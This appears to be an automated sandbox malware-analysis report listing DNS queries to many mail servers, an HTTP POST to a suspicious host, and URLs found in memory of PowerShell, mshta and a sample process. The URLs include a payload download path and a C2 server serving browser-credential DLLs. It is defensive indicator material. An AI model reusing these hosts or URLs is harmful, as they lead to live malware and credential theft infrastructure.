                                                Source: global traffic | DNS traffic detected: DNS query: out.saks.my.id
                                                Source: global traffic | DNS traffic detected: DNS query: alt1.ap.email.fireeyecloud.com
                                                Source: global traffic | DNS traffic detected: DNS query: tele2.fr
                                                Source: global traffic | DNS traffic detected: DNS query: gre07.vas-server.cz
                                                Source: global traffic | DNS traffic detected: DNS query: estvideo.fr
                                                Source: global traffic | DNS traffic detected: DNS query: post.cz
                                                Source: global traffic | DNS traffic detected: DNS query: out.bostonmarketing.org
                                                Source: global traffic | DNS traffic detected: DNS query: secure.aecom.com
                                                Source: global traffic | DNS traffic detected: DNS query: talk21.com
                                                Source: global traffic | DNS traffic detected: DNS query: mail.xcz.com
                                                Source: global traffic | DNS traffic detected: DNS query: stjoebruins.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.POP.COM.BR
                                                Source: global traffic | DNS traffic detected: DNS query: ALT1.ASPMX.L.GOOGLE.COM
                                                Source: global traffic | DNS traffic detected: DNS query: vorsin.net
                                                Source: global traffic | DNS traffic detected: DNS query: gvnkva.com
                                                Source: global traffic | DNS traffic detected: DNS query: gmbol.cem
                                                Source: global traffic | DNS traffic detected: DNS query: chemringts.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.Studsandsuds.onmicrosoft.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.3a5r.com
                                                Source: global traffic | DNS traffic detected: DNS query: secure.proton.me
                                                Source: global traffic | DNS traffic detected: DNS query: earthlink.net
                                                Source: global traffic | DNS traffic detected: DNS query: secure.temp2.club
                                                Source: global traffic | DNS traffic detected: DNS query: aspmx3.googlemail.com
                                                Source: global traffic | DNS traffic detected: DNS query: pinkinbox.org
                                                Source: global traffic | DNS traffic detected: DNS query: mx1-us1.ppe-hosted.com
                                                Source: global traffic | DNS traffic detected: DNS query: centrasep.com
                                                Source: global traffic | DNS traffic detected: DNS query: sky.com
                                                Source: global traffic | DNS traffic detected: DNS query: centrum.sk
                                                Source: global traffic | DNS traffic detected: DNS query: citromail.hu
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.wemo-barbing.de
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.execpc.com
                                                Source: global traffic | DNS traffic detected: DNS query: mail.ocens.com
                                                Source: global traffic | DNS traffic detected: DNS query: abv.bg
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.manning.nottingham.sch.uk
                                                Source: global traffic | DNS traffic detected: DNS query: aspmx.l.google.com
                                                Source: global traffic | DNS traffic detected: DNS query: seznam.cz
                                                Source: global traffic | DNS traffic detected: DNS query: us2.mx2.mailhostbox.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.siemens.com
                                                Source: global traffic | DNS traffic detected: DNS query: mail.ashebe.cf
                                                Source: global traffic | DNS traffic detected: DNS query: out.z7azw.com
                                                Source: global traffic | DNS traffic detected: DNS query: out.mpundit.fr
                                                Source: global traffic | DNS traffic detected: DNS query: securesmtp.windsorvoice.co.uk
                                                Source: global traffic | DNS traffic detected: DNS query: mx1.mailchannels.net
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.aluno.ceiparaty.com.br
                                                Source: global traffic | DNS traffic detected: DNS query: ivnffgsr.com
                                                Source: global traffic | DNS traffic detected: DNS query: mail.ext.yousician.com
                                                Source: global traffic | DNS traffic detected: DNS query: out.chat2play.com
                                                Source: global traffic | DNS traffic detected: DNS query: carrollton.k12.mi.us
                                                Source: global traffic | DNS traffic detected: DNS query: rotulon.com
                                                Source: global traffic | DNS traffic detected: DNS query: 4prkrmmail.net
                                                Source: global traffic | DNS traffic detected: DNS query: solcom.de
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.itpro.nl
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.oransd.fr
                                                Source: global traffic | DNS traffic detected: DNS query: securesmtp.poocanoe.com
                                                Source: global traffic | DNS traffic detected: DNS query: securesmtp.lexiconitkonsult.se
                                                Source: global traffic | DNS traffic detected: DNS query: autopujcovna-golem.cz
                                                Source: global traffic | DNS traffic detected: DNS query: out.guruku.id
                                                Source: global traffic | DNS traffic detected: DNS query: pec.it
                                                Source: global traffic | DNS traffic detected: DNS query: districtdesignnaples.com
                                                Source: global traffic | DNS traffic detected: DNS query: out.keybusiness.fr
                                                Source: global traffic | DNS traffic detected: DNS query: numeo.fr
                                                Source: global traffic | DNS traffic detected: DNS query: out.telefonica.net
                                                Source: global traffic | DNS traffic detected: DNS query: mail.PERUVIANA.PE
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.eadsimples.com.br
                                                Source: global traffic | DNS traffic detected: DNS query: infonie.fr
                                                Source: global traffic | DNS traffic detected: DNS query: securesmtp.barkernyc.com
                                                Source: global traffic | DNS traffic detected: DNS query: reception01.mail-vert.fr
                                                Source: global traffic | DNS traffic detected: DNS query: fix.zp.ua
                                                Source: global traffic | DNS traffic detected: DNS query: out.nesjo.education
                                                Source: global traffic | DNS traffic detected: DNS query: buckeyeexpress.com
                                                Source: global traffic | DNS traffic detected: DNS query: securesmtp.c1jjpan.com
                                                Source: global traffic | DNS traffic detected: DNS query: bbox.fr
                                                Source: global traffic | DNS traffic detected: DNS query: excite.com
                                                Source: global traffic | DNS traffic detected: DNS query: smtp.goskywest.com
                                                Source: global traffic | DNS traffic detected: DNS query: marjana.ua
                                                Source: global traffic | DNS traffic detected: DNS query: out.maplecrestpartners.com
                                                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: exarthynature.run
                                                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 06 Mar 2025 07:10:59 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | X-Frame-Options: SAMEORIGIN | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSgtbx97lgCHsSR4s3VYoEUxjVywwCRE9kpbe90WM9DGO1Tk6q%2FDbcCYcboGzIuvuN7GILQOBs5RQqBphV9ObE%2BQ6uFy93HwvmIDVeoegs21ig24%2F1%2FHo7yvEZ9AgvtJSHHA1g%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91c009547e23741a-MIA
                                                Source: mshta.exe, 00000039.00000003.2227243376.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000039.00000003.2271287720.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000039.00000003.2214512864.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000039.00000002.2276451285.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.1
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.0000000005861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2295199412.0000000005202000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7
                                                Source: powershell.exe, 00000043.00000002.2345485955.0000000000A18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe
                                                Source: powershell.exe, 00000023.00000002.2205159919.0000000008F10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.1130a
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cac.digicert.com/Di
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAss
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crt0
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                                Source: powershell.exe, 00000023.00000002.2188885216.0000000007AE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
                                                Source: powershell.exe, 00000023.00000002.2188885216.0000000007AE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.c
                                                Source: powershell.exe, 0000003A.00000002.2287824662.00000000031C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                                                Source: powershell.exe, 00000026.00000002.2212151636.000002143F2A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftSIt
                                                Source: powershell.exe, 00000043.00000002.2548889037.000000000717E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftm
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCe
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4Cod
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.00000000010E7000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu/
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php%C
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php2
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpApplication
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpEi?
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpH
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpH1?
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpHH?1
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpI~?
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpR?
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpUB
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpance
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpl0
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phprome
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.phpuBh
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//gtthfbsb2h.php~
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/freebl3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/freebl3.dllrW
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/mozglue.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/mozglue.dlllW
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/msvcp140.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/msvcp140.dlln#
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllhH$
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllontent
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllowser
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/nss3.dllved-By
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dll(##
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dlln
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dllr#
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/softokn3.dllv$
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/sqlite3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/sqlite3.dllXWt
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/sqlite3.dllr
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu//kj2h34kj23h4/vcruntime140.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmp | String found in binary or memory: http://dugong.ydns.eu/Local
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmp | String found in binary or memory: http://dugong.ydns.eu/LocalMicrosoft
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu/W
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://dugong.ydns.eu/g.ydns.eu//kj2h34kj23h4/nss3.dll
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.00000000010E7000.00000040.00000001.01000000.00000013.sdmp | String found in binary or memory: http://dugong.ydns.eu/gtthfbsb2h.php3d6e242715944deffc86f8a0637d2d9888release
                                                Source: svchost.exe, 0000001B.00000003.2048843195.000001CA3FDB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                                Source: powershell.exe, 00000006.00000002.1367413665.00000000059EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD69A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2181027395.000000000655C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2375933907.0000000006041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.d.Naye.
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
                                                Source: powershell.exe, 00000043.00000002.2361011964.0000000004A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1410817500.000001DDBD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2398882019.0000021441071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2295199412.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                                Source: powershell.exe, 00000043.00000002.2361011964.0000000004A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                                Source: powershell.exe, 00000006.00000002.1370376809.00000000070C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.col
                                                Source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2550443033.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                                Source: powershell.exe, 00000009.00000002.1410817500.000001DDBD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2398882019.0000021441071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2295199412.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                                Source: powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                                Source: powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                                Source: powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                                Source: svchost.exe, 0000001B.00000003.2048843195.000001CA3FE19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                                Source: svchost.exe, 0000001B.00000003.2048843195.000001CA3FDB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                                Source: powershell.exe, 00000043.00000002.2361011964.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000005166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1410817500.000001DDBE10E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.0000000005B05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                                                Source: powershell.exe, 00000006.00000002.1367413665.00000000059EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1459848850.000001DDCD69A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2181027395.000000000655C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2375933907.0000000006029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2475582182.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoa
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BAE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
